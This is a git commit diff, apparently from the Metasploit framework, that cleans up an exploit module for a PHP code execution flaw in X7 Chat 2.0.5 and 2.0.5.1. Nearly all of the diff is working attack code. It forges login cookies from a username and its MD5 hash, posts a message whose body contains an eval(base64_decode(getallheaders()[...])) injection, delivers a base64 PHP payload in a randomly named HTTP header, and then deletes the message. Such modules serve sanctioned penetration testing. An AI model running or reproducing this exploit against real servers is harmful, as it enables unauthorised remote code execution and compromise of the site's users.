Fix issues reported by wchen-r7

itsecurityco · itsecurityco · commit 9f21ac8ba28c · 2014-10-28T21:31:33.000-05:00
diff --git a/modules/exploits/multi/http/x7chat2_php_exec.rb b/modules/exploits/multi/http/x7chat2_php_exec.rb
@@ -15,8 +15,8 @@ def initialize(info = {})
     super(update_info(info,
       'Name'           => 'The X7 Group X7 Chat 2.0.5 lib/message.php preg_replace() PHP Code Execution',
       'Description'    => %q{
-        Library lib/message.php for X7 Chat 2.0.5 uses preg_replace() function with the /e modifier.
-            This allows execute PHP code in the remote machine.
+        Library lib/message.php for X7 Chat version 2.0.5 and 2.0.5.1 uses preg_replace() function with the /e modifier.
+        This allows execute PHP code in the remote machine.
       },
       'License'        => MSF_LICENSE,
       'Author'         =>
@@ -25,10 +25,8 @@ def initialize(info = {})
           'Juan Escobar <eng.jescobar[at]gmail.com>', # module development @itsecurityco
         ],
       'Platform'       => ['php'],
-          'Arch'           => ARCH_PHP,
-      'Targets'        => [
-        ['Generic (PHP Payload)', {}]
-      ],
+      'Arch'           => ARCH_PHP,
+      'Targets'        => [['Generic (PHP Payload)', {}]],
       'DisclosureDate' => 'Oct 27 2014',
       'DefaultTarget'  => 0))
 
@@ -41,7 +39,7 @@ def initialize(info = {})
   end
 
   def check
-      res = exec_php("phpinfo(); die();", true)
+      res = exec_php('phpinfo(); die();', true)
 
       if res && res.body =~ /This program makes use of the Zend/
         return Exploit::CheckCode::Vulnerable
@@ -52,60 +50,60 @@ def check
 
   def exec_php(php_code, check = false)
 
-    cookie_x7c2u = "X7C2U=" + datastore['USERNAME']
-    cookie_x7c2p = "X7C2P=" + Rex::Text.md5(datastore['USERNAME'])
+    cookie_x7c2u = "X7C2U=#{ datastore['USERNAME'] }"
+    cookie_x7c2p = "X7C2P=#{ Rex::Text.md5(datastore['USERNAME']) }"
     rand_text = Rex::Text.rand_text_alpha(5, 8)
 
     # remove comments, line breaks and spaces
     praw = php_code.gsub(/(\s+)|(#.*)/, '')
 
     # clean b64 (we can not use quotes or apostrophes and b64 string must not contain equals)
     while Rex::Text.encode_base64(praw) =~ /==/ || Rex::Text.encode_base64(praw) =~ /=/
-      praw = praw + " "
+      praw = "#{ praw } "
     end
 
     pb64 = Rex::Text.encode_base64(praw)
 
-    print_status("Sending offline message (#{rand_text}) to #{datastore['USERNAME']}...")
+    print_status("Sending offline message (#{ rand_text }) to #{ datastore['USERNAME'] }...")
     res = send_request_cgi({
       'method'   => 'GET',
       'uri'      => normalize_uri(target_uri.path, 'index.php'),
       'headers'  => {
-        'Cookie' => "#{cookie_x7c2u}; #{cookie_x7c2p};",
+        'Cookie' => "#{ cookie_x7c2u }; #{ cookie_x7c2p };",
       },
       'vars_get' => {
         'act'     => 'userpanel',
         'cp_page' => 'msgcenter',
-        'to'     => datastore['USERNAME'],
+        'to'      => datastore['USERNAME'],
         'subject' => rand_text,
-        'body'     => "#{rand_text}www.${eval(base64_decode(getallheaders()[p]))}.c#{rand_text}",
+        'body'    => "#{ rand_text }www.${eval(base64_decode(getallheaders()[#{ rand_text }]))}.c#{ rand_text }",
       }
     })
 
     if res && res.code == 200
-      print_good("Message (#{rand_text}) sent successfully")
+      print_good("Message (#{ rand_text }) sent successfully")
     else
-      print_error("Sending the message (#{rand_text}) has failed")
-      return Exploit::CheckCode::Unknown
+      print_error("Sending the message (#{ rand_text }) has failed")
+      return
     end
 
-    if res && res.body =~ /([0-9]*)">#{rand_text}/
-      message_id = $1
+    if res && res.body =~ /([0-9]*)">#{ rand_text }/
+      message_id = Regexp.last_match[1]
     else
-      print_error("Could not find message (#{rand_text}) in the message list")
-      return Exploit::CheckCode::Unknown
+      print_error("Could not find message (#{ rand_text }) in the message list")
+      return
     end
 
-    print_status("Accessing message (#{rand_text})")
-    print_status("Sending payload in HTTP header 'p'")
+    print_status("Accessing message (#{ rand_text })")
+    print_status("Sending payload in HTTP header '#{ rand_text }'")
     res = send_request_cgi({
-      'method'   => 'GET',
-      'uri'      => normalize_uri(target_uri.path, 'index.php'),
-      'headers'  => {
-        'Cookie' => "#{cookie_x7c2u}; #{cookie_x7c2p};",
-        'p'     => "#{pb64}",
+      'method'    => 'GET',
+      'uri'       => normalize_uri(target_uri.path, 'index.php'),
+      'headers'   => {
+        'Cookie'  => "#{ cookie_x7c2u }; #{ cookie_x7c2p };",
+        rand_text => pb64,
       },
-      'vars_get' => {
+      'vars_get'  => {
         'act'     => 'userpanel',
         'cp_page' => 'msgcenter',
         'read'    =>  message_id,
@@ -114,12 +112,12 @@ def exec_php(php_code, check = false)
 
     res_payload = res
 
-    print_status("Deleting message (#{rand_text})")
+    print_status("Deleting message (#{ rand_text })")
     res = send_request_cgi({
       'method'   => 'GET',
       'uri'      => normalize_uri(target_uri.path, 'index.php'),
       'headers'  => {
-        'Cookie' => "#{cookie_x7c2u}; #{cookie_x7c2p};",
+        'Cookie' => "#{ cookie_x7c2u }; #{ cookie_x7c2p };",
       },
       'vars_get' => {
         'act'     => 'userpanel',
@@ -129,9 +127,9 @@ def exec_php(php_code, check = false)
     })
 
     if res && res.body =~ /The message has been deleted/
-      print_good("Message (#{rand_text}) removed")
+      print_good("Message (#{ rand_text }) removed")
     else
-      print_error("Removing message (#{rand_text}) has failed")
+      print_error("Removing message (#{ rand_text }) has failed")
     end
 
     # if check return the response
